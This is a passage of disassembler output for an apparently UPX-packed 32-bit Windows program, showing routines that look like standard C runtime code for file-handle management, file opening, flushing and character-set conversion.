retn
sub_423828 endp
; =============== S U B R O U T I N E =======================================
sub_4238A2 proc near ; CODE XREF: sub_41DA72+32�p
; sub_41DA72+49�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, ds:dword_4DCDA0
jnb short loc_4238CA
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, ds:dword_4DCCA0[ecx*4]
test byte ptr [ecx+eax*8+4], 1
lea eax, [ecx+eax*8]
jz short loc_4238CA
mov eax, [eax]
retn
; ---------------------------------------------------------------------------
loc_4238CA: ; CODE XREF: sub_4238A2+A�j
; sub_4238A2+23�j
and ds:dword_4DB95C, 0
mov ds:dword_4DB958, 9
or eax, 0FFFFFFFFh
retn
sub_4238A2 endp
; =============== S U B R O U T I N E =======================================
sub_4238DF proc near ; CODE XREF: sub_41DB50+2B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, ds:dword_4DCDA0
jnb short loc_423928
mov ecx, eax
mov edx, eax
sar ecx, 5
and edx, 1Fh
mov ecx, ds:dword_4DCCA0[ecx*4]
test byte ptr [ecx+edx*8+4], 1
jz short loc_423928
push eax
call sub_4238A2
pop ecx
push eax
call dword_427028 ; FlushFileBuffers
test eax, eax
jnz short loc_42391D
call dword_42708C ; RtlGetLastWin32Error
jmp short loc_42391F
; ---------------------------------------------------------------------------
loc_42391D: ; CODE XREF: sub_4238DF+34�j
xor eax, eax
loc_42391F: ; CODE XREF: sub_4238DF+3C�j
test eax, eax
jz short locret_423935
mov ds:dword_4DB95C, eax
loc_423928: ; CODE XREF: sub_4238DF+A�j
; sub_4238DF+22�j
mov ds:dword_4DB958, 9
or eax, 0FFFFFFFFh
locret_423935: ; CODE XREF: sub_4238DF+42�j
retn
sub_4238DF endp
; =============== S U B R O U T I N E =======================================
sub_423936 proc near ; DATA XREF: UPX0:00429024�o
mov eax, ds:dword_4DCC80
push esi
push 14h
test eax, eax
pop esi
jnz short loc_42394A
mov eax, 200h
jmp short loc_423950
; ---------------------------------------------------------------------------
loc_42394A: ; CODE XREF: sub_423936+B�j
cmp eax, esi
jge short loc_423955
mov eax, esi
loc_423950: ; CODE XREF: sub_423936+12�j
mov ds:dword_4DCC80, eax
loc_423955: ; CODE XREF: sub_423936+16�j
push 4
push eax
call sub_424E01
pop ecx
mov ds:dword_4DBC78, eax
test eax, eax
pop ecx
jnz short loc_423989
push 4
push esi
mov ds:dword_4DCC80, esi
call sub_424E01
pop ecx
mov ds:dword_4DBC78, eax
test eax, eax
pop ecx
jnz short loc_423989
push 1Ah
call sub_41DA29
pop ecx
loc_423989: ; CODE XREF: sub_423936+30�j
; sub_423936+49�j
xor ecx, ecx
mov eax, offset off_43D0C8
loc_423990: ; CODE XREF: sub_423936+6E�j
mov edx, ds:dword_4DBC78
mov [ecx+edx], eax
add eax, 20h
add ecx, 4
cmp eax, offset dword_43D348
jl short loc_423990
xor edx, edx
mov ecx, offset dword_43D0D8
loc_4239AD: ; CODE XREF: sub_423936+A1�j
mov eax, edx
mov esi, edx
sar eax, 5
and esi, 1Fh
mov eax, ds:dword_4DCCA0[eax*4]
mov eax, [eax+esi*8]
cmp eax, 0FFFFFFFFh
jz short loc_4239CA
test eax, eax
jnz short loc_4239CD
loc_4239CA: ; CODE XREF: sub_423936+8E�j
or dword ptr [ecx], 0FFFFFFFFh
loc_4239CD: ; CODE XREF: sub_423936+92�j
add ecx, 20h
inc edx
cmp ecx, offset dword_43D138
jl short loc_4239AD
pop esi
retn
sub_423936 endp
; =============== S U B R O U T I N E =======================================
sub_4239DB proc near ; DATA XREF: UPX0:00429034�o
; FUNCTION CHUNK AT 00424EB2 SIZE 00000058 BYTES
call sub_41DBE7
cmp ds:byte_4DB998, 0
jz short locret_4239EE
jmp loc_424EB2
; ---------------------------------------------------------------------------
locret_4239EE: ; CODE XREF: sub_4239DB+C�j
retn
sub_4239DB endp
; =============== S U B R O U T I N E =======================================
sub_4239EF proc near ; CODE XREF: sub_41F043+32�p
; sub_41F58A+6C�p ...
arg_0 = dword ptr 4
inc ds:dword_4DBB40
push 1000h
call sub_41B4D5
pop ecx
mov ecx, [esp+arg_0]
test eax, eax
mov [ecx+8], eax
jz short loc_423A18
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_423A29
; ---------------------------------------------------------------------------
loc_423A18: ; CODE XREF: sub_4239EF+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_423A29: ; CODE XREF: sub_4239EF+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_4239EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423A33 proc near ; CODE XREF: sub_41F32D+13F�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
mov ecx, [ebp+arg_4]
push ebx
xor ebx, ebx
push esi
test cl, 80h
push edi
mov [ebp+var_1C], 0Ch
mov [ebp+var_18], ebx
jz short loc_423A59
mov [ebp+var_14], ebx
mov [ebp+var_1], 10h
jmp short loc_423A64
; ---------------------------------------------------------------------------
loc_423A59: ; CODE XREF: sub_423A33+1B�j
and [ebp+var_1], 0
mov [ebp+var_14], 1
loc_423A64: ; CODE XREF: sub_423A33+24�j
mov eax, 8000h
test ecx, eax
jnz short loc_423A7E
test ch, 40h
jnz short loc_423A7A
cmp ds:dword_4DBC50, eax
jz short loc_423A7E
loc_423A7A: ; CODE XREF: sub_423A33+3D�j
or [ebp+var_1], 80h
loc_423A7E: ; CODE XREF: sub_423A33+38�j
; sub_423A33+45�j
push 3
mov eax, ecx
pop esi
and eax, esi
sub eax, ebx
jz short loc_423AB6
dec eax
jz short loc_423AAD
dec eax
jz short loc_423AA4
loc_423A8F: ; CODE XREF: sub_423A33+9F�j
; sub_423A33+E8�j ...
mov ds:dword_4DB958, 16h
mov ds:dword_4DB95C, ebx
jmp loc_423CC9
; ---------------------------------------------------------------------------
loc_423AA4: ; CODE XREF: sub_423A33+5A�j
mov [ebp+var_C], 0C0000000h
jmp short loc_423ABD
; ---------------------------------------------------------------------------
loc_423AAD: ; CODE XREF: sub_423A33+57�j
mov [ebp+var_C], 40000000h
jmp short loc_423ABD
; ---------------------------------------------------------------------------
loc_423AB6: ; CODE XREF: sub_423A33+54�j
mov [ebp+var_C], 80000000h
loc_423ABD: ; CODE XREF: sub_423A33+78�j
; sub_423A33+81�j
mov eax, [ebp+arg_8]
cmp eax, 10h
jz short loc_423AEB
cmp eax, 20h
jz short loc_423AE2
cmp eax, 30h
jz short loc_423AD9
cmp eax, 40h
jnz short loc_423A8F
mov [ebp+var_10], esi
jmp short loc_423AEE
; ---------------------------------------------------------------------------
loc_423AD9: ; CODE XREF: sub_423A33+9A�j
mov [ebp+var_10], 2
jmp short loc_423AEE
; ---------------------------------------------------------------------------
loc_423AE2: ; CODE XREF: sub_423A33+95�j
mov [ebp+var_10], 1
jmp short loc_423AEE
; ---------------------------------------------------------------------------
loc_423AEB: ; CODE XREF: sub_423A33+90�j
mov [ebp+var_10], ebx
loc_423AEE: ; CODE XREF: sub_423A33+A4�j
; sub_423A33+AD�j ...
mov edx, 700h
mov eax, 400h
and ecx, edx
mov edi, 100h
cmp ecx, eax
jg short loc_423B38
jz short loc_423B33
cmp ecx, ebx
jz short loc_423B33
cmp ecx, edi
jz short loc_423B2A
cmp ecx, 200h
jz short loc_423B51
cmp ecx, 300h
jnz loc_423A8F
mov [ebp+var_8], 2
jmp short loc_423B61
; ---------------------------------------------------------------------------
loc_423B2A: ; CODE XREF: sub_423A33+D8�j
mov [ebp+var_8], 4
jmp short loc_423B61
; ---------------------------------------------------------------------------
loc_423B33: ; CODE XREF: sub_423A33+D0�j
; sub_423A33+D4�j
mov [ebp+var_8], esi
jmp short loc_423B61
; ---------------------------------------------------------------------------
loc_423B38: ; CODE XREF: sub_423A33+CE�j
cmp ecx, 500h
jz short loc_423B5A
cmp ecx, 600h
jz short loc_423B51
cmp ecx, edx
jz short loc_423B5A
jmp loc_423A8F
; ---------------------------------------------------------------------------
loc_423B51: ; CODE XREF: sub_423A33+E0�j
; sub_423A33+113�j
mov [ebp+var_8], 5
jmp short loc_423B61
; ---------------------------------------------------------------------------
loc_423B5A: ; CODE XREF: sub_423A33+10B�j
; sub_423A33+117�j
mov [ebp+var_8], 1
loc_423B61: ; CODE XREF: sub_423A33+F5�j
; sub_423A33+FE�j ...
mov eax, [ebp+arg_4]
mov esi, 80h
test eax, edi
jz short loc_423B80
mov ecx, ds:dword_4DB960
not ecx
and ecx, [ebp+arg_C]
test cl, 80h
jnz short loc_423B80
push 1
pop esi
loc_423B80: ; CODE XREF: sub_423A33+138�j
; sub_423A33+148�j
test al, 40h
jz short loc_423B8E
or esi, 4000000h
or byte ptr [ebp+var_C+2], 1
loc_423B8E: ; CODE XREF: sub_423A33+14F�j
test ah, 10h
jz short loc_423B95
or esi, edi
loc_423B95: ; CODE XREF: sub_423A33+15E�j
test al, 20h
jz short loc_423BA1
or esi, 8000000h
jmp short loc_423BAB
; ---------------------------------------------------------------------------
loc_423BA1: ; CODE XREF: sub_423A33+164�j
test al, 10h
jz short loc_423BAB
or esi, 10000000h
loc_423BAB: ; CODE XREF: sub_423A33+16C�j
; sub_423A33+170�j
call sub_42371C
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
jnz short loc_423BCC
and ds:dword_4DB95C, 0
mov ds:dword_4DB958, 18h
jmp short loc_423C0A
; ---------------------------------------------------------------------------
loc_423BCC: ; CODE XREF: sub_423A33+184�j
push 0
push esi
push [ebp+var_8]
lea eax, [ebp+var_1C]
push eax
push [ebp+var_10]
push [ebp+var_C]
push [ebp+arg_0]
call dword_4270EC ; CreateFileA
mov esi, eax
cmp esi, edi
jz short loc_423BFD
push esi
call dword_427030 ; GetFileType
test eax, eax
jnz short loc_423C11
push esi
call dword_427068 ; CloseHandle
loc_423BFD: ; CODE XREF: sub_423A33+1B6�j
call dword_42708C ; RtlGetLastWin32Error
push eax
call sub_4203DF
pop ecx
loc_423C0A: ; CODE XREF: sub_423A33+197�j
mov eax, edi
jmp loc_423CE7
; ---------------------------------------------------------------------------
loc_423C11: ; CODE XREF: sub_423A33+1C1�j
cmp eax, 2
jnz short loc_423C1C
or [ebp+var_1], 40h
jmp short loc_423C25
; ---------------------------------------------------------------------------
loc_423C1C: ; CODE XREF: sub_423A33+1E1�j
cmp eax, 3
jnz short loc_423C25
or [ebp+var_1], 8
loc_423C25: ; CODE XREF: sub_423A33+1E7�j
; sub_423A33+1EC�j
push esi
push ebx
call sub_4237B1
pop ecx
mov al, [ebp+var_1]
pop ecx
mov esi, ebx
mov ecx, ebx
or al, 1
sar ecx, 5
and esi, 1Fh
mov byte ptr [ebp+arg_0+3], al
lea edi, ds:4DCCA0h[ecx*4]
shl esi, 3
mov ecx, [edi]
and byte ptr [ebp+arg_0+3], 48h
mov [ecx+esi+4], al
jnz short loc_423CCE
test al, 80h
jz short loc_423CCE
test byte ptr [ebp+arg_4], 2
jz short loc_423CCE
push 2
push 0FFFFFFFFh
push ebx
call sub_42272B
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_423C83
cmp ds:dword_4DB95C, 83h
jz short loc_423CCE
jmp short loc_423CC2
; ---------------------------------------------------------------------------
loc_423C83: ; CODE XREF: sub_423A33+240�j
and byte ptr [ebp+arg_8+3], 0
lea eax, [ebp+arg_8+3]
push 1
push eax
push ebx
call sub_41F11C
add esp, 0Ch
test eax, eax
jnz short loc_423CB0
cmp byte ptr [ebp+arg_8+3], 1Ah
jnz short loc_423CB0
push [ebp+var_10]
push ebx
call sub_424F0A
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_423CC2
loc_423CB0: ; CODE XREF: sub_423A33+265�j
; sub_423A33+26B�j
push 0
push 0
push ebx
call sub_42272B
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jnz short loc_423CCE
loc_423CC2: ; CODE XREF: sub_423A33+24E�j
; sub_423A33+27B�j
push ebx
call sub_41DA72
pop ecx
loc_423CC9: ; CODE XREF: sub_423A33+6C�j
or eax, 0FFFFFFFFh
jmp short loc_423CE7
; ---------------------------------------------------------------------------
loc_423CCE: ; CODE XREF: sub_423A33+221�j
; sub_423A33+225�j ...
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_423CE5
test byte ptr [ebp+arg_4], 8
jz short loc_423CE5
mov eax, [edi]
or byte ptr [eax+esi+4], 20h
lea eax, [eax+esi+4]
loc_423CE5: ; CODE XREF: sub_423A33+29F�j
; sub_423A33+2A5�j
mov eax, ebx
loc_423CE7: ; CODE XREF: sub_423A33+1D9�j
; sub_423A33+299�j
pop edi
pop esi
pop ebx
leave
retn
sub_423A33 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423CEC proc near ; CODE XREF: sub_41F515+5E�p
; sub_4200E8+9A�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_427C48
push offset sub_4234B8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, ds:dword_4DBB48
xor ebx, ebx
cmp eax, ebx
jnz short loc_423D5B
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_427938
push esi
call dword_427020 ; GetStringTypeW
test eax, eax
jz short loc_423D39
mov eax, esi
jmp short loc_423D56
; ---------------------------------------------------------------------------
loc_423D39: ; CODE XREF: sub_423CEC+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_4CB50C
push esi
push ebx
call dword_427024 ; GetStringTypeA
test eax, eax
jz loc_423E21
push 2
pop eax
loc_423D56: ; CODE XREF: sub_423CEC+4B�j
mov ds:dword_4DBB48, eax
loc_423D5B: ; CODE XREF: sub_423CEC+2F�j
cmp eax, 2
jnz short loc_423D84
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_423D6C
mov eax, ds:dword_4DBA14
loc_423D6C: ; CODE XREF: sub_423CEC+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call dword_427024 ; GetStringTypeA
jmp loc_423E23
; ---------------------------------------------------------------------------
loc_423D84: ; CODE XREF: sub_423CEC+72�j
cmp eax, 1
jnz loc_423E21
cmp [ebp+arg_10], ebx
jnz short loc_423D9A
mov eax, ds:dword_4DBA24
mov [ebp+arg_10], eax
loc_423D9A: ; CODE XREF: sub_423CEC+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
call dword_427180 ; MultiByteToWideChar
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_423E21
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_41BB20
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_41B590
add esp, 0Ch
jmp short loc_423DF0
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_423DF0: ; CODE XREF: sub_423CEC+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_423E21
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call dword_427180 ; MultiByteToWideChar
cmp eax, ebx
jz short loc_423E21
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call dword_427020 ; GetStringTypeW
jmp short loc_423E23
; ---------------------------------------------------------------------------
loc_423E21: ; CODE XREF: sub_423CEC+61�j
; sub_423CEC+9B�j ...
xor eax, eax
loc_423E23: ; CODE XREF: sub_423CEC+93�j
; sub_423CEC+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_423CEC endp
; =============== S U B R O U T I N E =======================================
sub_423E35 proc near ; CODE XREF: sub_41F58A+61�p
; sub_420446+8�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, ds:dword_4DCDA0
jb short loc_423E44
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_423E44: ; CODE XREF: sub_423E35+A�j
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, ds:dword_4DCCA0[ecx*4]
mov al, [ecx+eax*8+4]
and eax, 40h
retn
sub_423E35 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423E5B proc near ; CODE XREF: sub_41F69F+2D4�p
; sub_41F69F+6B3�p
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
test eax, eax
jnz short loc_423E67
pop ebp
retn
; ---------------------------------------------------------------------------
loc_423E67: ; CODE XREF: sub_423E5B+8�j
cmp ds:dword_4DBA14, 0
jnz short loc_423E82
mov cx, [ebp+arg_4]
cmp cx, 0FFh
ja short loc_423EB4
push 1
mov [eax], cl
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_423E82: ; CODE XREF: sub_423E5B+13�j
lea ecx, [ebp+arg_0]
and [ebp+arg_0], 0
push ecx
push 0
push dword_43CBE4
push eax
lea eax, [ebp+arg_4]
push 1
push eax
push 220h
push ds:dword_4DBA24
call dword_42717C ; WideCharToMultiByte
test eax, eax
jz short loc_423EB4
cmp [ebp+arg_0], 0
jz short loc_423EC1
loc_423EB4: ; CODE XREF: sub_423E5B+1E�j
; sub_423E5B+51�j
mov ds:dword_4DB958, 2Ah
or eax, 0FFFFFFFFh
loc_423EC1: ; CODE XREF: sub_423E5B+57�j
pop ebp
retn
sub_423E5B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423EC3 proc near ; CODE XREF: sub_420510+6A3�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
jz short loc_423EE6
cmp [ebp+arg_8], ebx
jz short loc_423EE6
mov al, [esi]
cmp al, bl
jnz short loc_423EEC
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_423EE6
mov [eax], bx
loc_423EE6: ; CODE XREF: sub_423EC3+C�j
; sub_423EC3+11�j ...
xor eax, eax
loc_423EE8: ; CODE XREF: sub_423EC3+42�j
; sub_423EC3+86�j ...
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_423EEC: ; CODE XREF: sub_423EC3+17�j
cmp ds:dword_4DBA14, ebx
jnz short loc_423F07
mov ecx, [ebp+arg_0]
cmp ecx, ebx
jz short loc_423F02
movzx ax, al
mov [ecx], ax
loc_423F02: ; CODE XREF: sub_423EC3+36�j
; sub_423EC3+C0�j
push 1
pop eax
jmp short loc_423EE8
; ---------------------------------------------------------------------------
loc_423F07: ; CODE XREF: sub_423EC3+2F�j
mov ecx, off_43C9D8
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_423F64
mov eax, dword_43CBE4
cmp eax, 1
jle short loc_423F4B
cmp [ebp+arg_8], eax
jl short loc_423F55
xor ecx, ecx
cmp [ebp+arg_0], ebx
setnz cl
push ecx
push [ebp+arg_0]
push eax
push esi
push 9
push ds:dword_4DBA24
call dword_427180 ; MultiByteToWideChar
test eax, eax
mov eax, dword_43CBE4
jnz short loc_423EE8
loc_423F4B: ; CODE XREF: sub_423EC3+5C�j
cmp [ebp+arg_8], eax
jb short loc_423F55
cmp [esi+1], bl
jnz short loc_423EE8
loc_423F55: ; CODE XREF: sub_423EC3+61�j
; sub_423EC3+8B�j ...
mov ds:dword_4DB958, 2Ah
or eax, 0FFFFFFFFh
jmp short loc_423EE8
; ---------------------------------------------------------------------------
loc_423F64: ; CODE XREF: sub_423EC3+52�j
xor eax, eax
cmp [ebp+arg_0], ebx
setnz al
push eax
push [ebp+arg_0]
push 1
push esi
push 9
push ds:dword_4DBA24
call dword_427180 ; MultiByteToWideChar
test eax, eax
jnz loc_423F02
jmp short loc_423F55
sub_423EC3 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_423F90 proc near ; CODE XREF: sub_420510+797�p
; sub_420510+7E7�p
cmp cl, 40h
jnb short loc_423FAA
cmp cl, 20h
jnb short loc_423FA0
shld edx, eax, cl
shl eax, cl
retn
; ---------------------------------------------------------------------------
loc_423FA0: ; CODE XREF: sub_423F90+8�j
mov edx, eax
xor eax, eax
and cl, 1Fh
shl edx, cl
retn
; ---------------------------------------------------------------------------
loc_423FAA: ; CODE XREF: sub_423F90+3�j
xor eax, eax
xor edx, edx
retn
sub_423F90 endp
; =============== S U B R O U T I N E =======================================
sub_423FAF proc near ; CODE XREF: sub_420F86+F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
cmp ebx, 0FFFFFFFFh
push esi
jz short loc_423FFB
mov esi, [esp+8+arg_4]
mov eax, [esi+0Ch]
test al, 1
jnz short loc_423FCD
test al, 80h
jz short loc_423FFB
test al, 2
jnz short loc_423FFB
loc_423FCD: ; CODE XREF: sub_423FAF+14�j
cmp dword ptr [esi+8], 0
jnz short loc_423FDA
push esi
call sub_4239EF
pop ecx
loc_423FDA: ; CODE XREF: sub_423FAF+22�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_423FEA
cmp dword ptr [esi+4], 0
jnz short loc_423FFB
inc eax
mov [esi], eax
loc_423FEA: ; CODE XREF: sub_423FAF+30�j
test byte ptr [esi+0Ch], 40h
jz short loc_424001
dec dword ptr [esi]
mov eax, [esi]
cmp [eax], bl
jz short loc_424007
inc eax
mov [esi], eax
loc_423FFB: ; CODE XREF: sub_423FAF+9�j
; sub_423FAF+18�j ...
or eax, 0FFFFFFFFh
loc_423FFE: ; CODE XREF: sub_423FAF+6C�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_424001: ; CODE XREF: sub_423FAF+3F�j
dec dword ptr [esi]
mov eax, [esi]
mov [eax], bl
loc_424007: ; CODE XREF: sub_423FAF+47�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and al, 0EFh
or al, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_423FFE
sub_423FAF endp
; =============== S U B R O U T I N E =======================================
sub_42401D proc near ; CODE XREF: sub_421576+52�p
xor eax, eax
retn
sub_42401D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424020 proc near ; CODE XREF: sub_424055+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
fstcw word ptr [ebp+var_4]
push [ebp+var_4]
call sub_42406B
mov esi, eax
mov eax, [ebp+arg_4]
not eax
and esi, eax
mov eax, [ebp+arg_0]
and eax, [ebp+arg_4]
or esi, eax
push esi
call sub_4240FD
pop ecx
mov [ebp+arg_4], eax
pop ecx
fldcw word ptr [ebp+arg_4]
mov eax, esi
pop esi
leave
retn
sub_424020 endp
; =============== S U B R O U T I N E =======================================
sub_424055 proc near ; CODE XREF: sub_421862+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
and eax, 0FFF7FFFFh
push eax
push [esp+4+arg_0]
call sub_424020
pop ecx
pop ecx
retn
sub_424055 endp
; =============== S U B R O U T I N E =======================================
sub_42406B proc near ; CODE XREF: sub_424020+C�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push ebp
test bl, 1
push edi
jz short loc_42407C
push 10h
pop eax
loc_42407C: ; CODE XREF: sub_42406B+C�j
test bl, 4
jz short loc_424083
or al, 8
loc_424083: ; CODE XREF: sub_42406B+14�j
test bl, 8
jz short loc_42408A
or al, 4
loc_42408A: ; CODE XREF: sub_42406B+1B�j
test bl, 10h
jz short loc_424091
or al, 2
loc_424091: ; CODE XREF: sub_42406B+22�j
test bl, 20h
jz short loc_424098
or al, 1
loc_424098: ; CODE XREF: sub_42406B+29�j
test bl, 2
jz short loc_4240A2
or eax, 80000h
loc_4240A2: ; CODE XREF: sub_42406B+30�j
movzx ecx, bx
push esi
mov edx, ecx
mov esi, 0C00h
mov edi, 300h
and edx, esi
mov ebp, 200h
jz short loc_4240DA
cmp edx, 400h
jz short loc_4240D7
cmp edx, 800h
jz short loc_4240D3
cmp edx, esi
jnz short loc_4240DA
or eax, edi
jmp short loc_4240DA
; ---------------------------------------------------------------------------
loc_4240D3: ; CODE XREF: sub_42406B+5E�j
or eax, ebp
jmp short loc_4240DA
; ---------------------------------------------------------------------------
loc_4240D7: ; CODE XREF: sub_42406B+56�j
or ah, 1
loc_4240DA: ; CODE XREF: sub_42406B+4E�j
; sub_42406B+62�j ...
and ecx, edi
pop esi
jz short loc_4240EA
cmp ecx, ebp
jnz short loc_4240EF
or eax, 10000h
jmp short loc_4240EF
; ---------------------------------------------------------------------------
loc_4240EA: ; CODE XREF: sub_42406B+72�j
or eax, 20000h
loc_4240EF: ; CODE XREF: sub_42406B+76�j
; sub_42406B+7D�j
pop edi
pop ebp
test bh, 10h
pop ebx
jz short locret_4240FC
or eax, 40000h
locret_4240FC: ; CODE XREF: sub_42406B+8A�j
retn
sub_42406B endp
; =============== S U B R O U T I N E =======================================
sub_4240FD proc near ; CODE XREF: sub_424020+23�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push esi
test bl, 10h
jz short loc_42410D
push 1
pop eax
loc_42410D: ; CODE XREF: sub_4240FD+B�j
test bl, 8
jz short loc_424114
or al, 4
loc_424114: ; CODE XREF: sub_4240FD+13�j
test bl, 4
jz short loc_42411B
or al, 8
loc_42411B: ; CODE XREF: sub_4240FD+1A�j
test bl, 2
jz short loc_424122
or al, 10h
loc_424122: ; CODE XREF: sub_4240FD+21�j
test bl, 1
jz short loc_424129
or al, 20h
loc_424129: ; CODE XREF: sub_4240FD+28�j
test ebx, 80000h
jz short loc_424133
or al, 2
loc_424133: ; CODE XREF: sub_4240FD+32�j
mov ecx, ebx
mov edx, 300h
and ecx, edx
mov esi, 200h
jz short loc_424160
cmp ecx, 100h
jz short loc_42415D
cmp ecx, esi
jz short loc_424158
cmp ecx, edx
jnz short loc_424160
or ah, 0Ch
jmp short loc_424160
; ---------------------------------------------------------------------------
loc_424158: ; CODE XREF: sub_4240FD+50�j
or ah, 8
jmp short loc_424160
; ---------------------------------------------------------------------------
loc_42415D: ; CODE XREF: sub_4240FD+4C�j
or ah, 4
loc_424160: ; CODE XREF: sub_4240FD+44�j
; sub_4240FD+54�j ...
mov ecx, ebx
and ecx, 30000h
jz short loc_424176
cmp ecx, 10000h
jnz short loc_424178
or eax, esi
jmp short loc_424178
; ---------------------------------------------------------------------------
loc_424176: ; CODE XREF: sub_4240FD+6B�j
or eax, edx
loc_424178: ; CODE XREF: sub_4240FD+73�j
; sub_4240FD+77�j
pop esi
test ebx, 40000h
pop ebx
jz short locret_424185
or ah, 10h
locret_424185: ; CODE XREF: sub_4240FD+83�j
retn
sub_4240FD endp
; =============== S U B R O U T I N E =======================================
sub_424186 proc near ; CODE XREF: sub_424225+48�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
push 20h
cdq
pop ecx
idiv ecx
push 1Fh
mov esi, eax
mov eax, [esp+8+arg_4]
cdq
idiv ecx
pop ecx
mov eax, [esp+4+arg_0]
sub ecx, edx
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [eax+esi*4], edx
jnz short loc_4241CB
inc esi
cmp esi, 3
jge short loc_4241C6
lea eax, [eax+esi*4]
loc_4241B8: ; CODE XREF: sub_424186+3E�j
cmp dword ptr [eax], 0
jnz short loc_4241CB
inc esi
add eax, 4
cmp esi, 3
jl short loc_4241B8
loc_4241C6: ; CODE XREF: sub_424186+2D�j
push 1
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4241CB: ; CODE XREF: sub_424186+27�j
; sub_424186+35�j
xor eax, eax
pop esi
retn
sub_424186 endp
; =============== S U B R O U T I N E =======================================
sub_4241CF proc near ; CODE XREF: sub_424225+57�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push ebx
push esi
push edi
push 20h
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
idiv ecx
mov esi, eax
mov eax, [esp+0Ch+arg_4]
cdq
idiv ecx
lea edi, [ebx+esi*4]
push edi
push 1Fh
pop ecx
push 1
pop eax
sub ecx, edx
shl eax, cl
push eax
push dword ptr [edi]
call sub_425050
add esp, 0Ch
dec esi
js short loc_424221
lea edi, [ebx+esi*4]
loc_424208: ; CODE XREF: sub_4241CF+50�j
test eax, eax
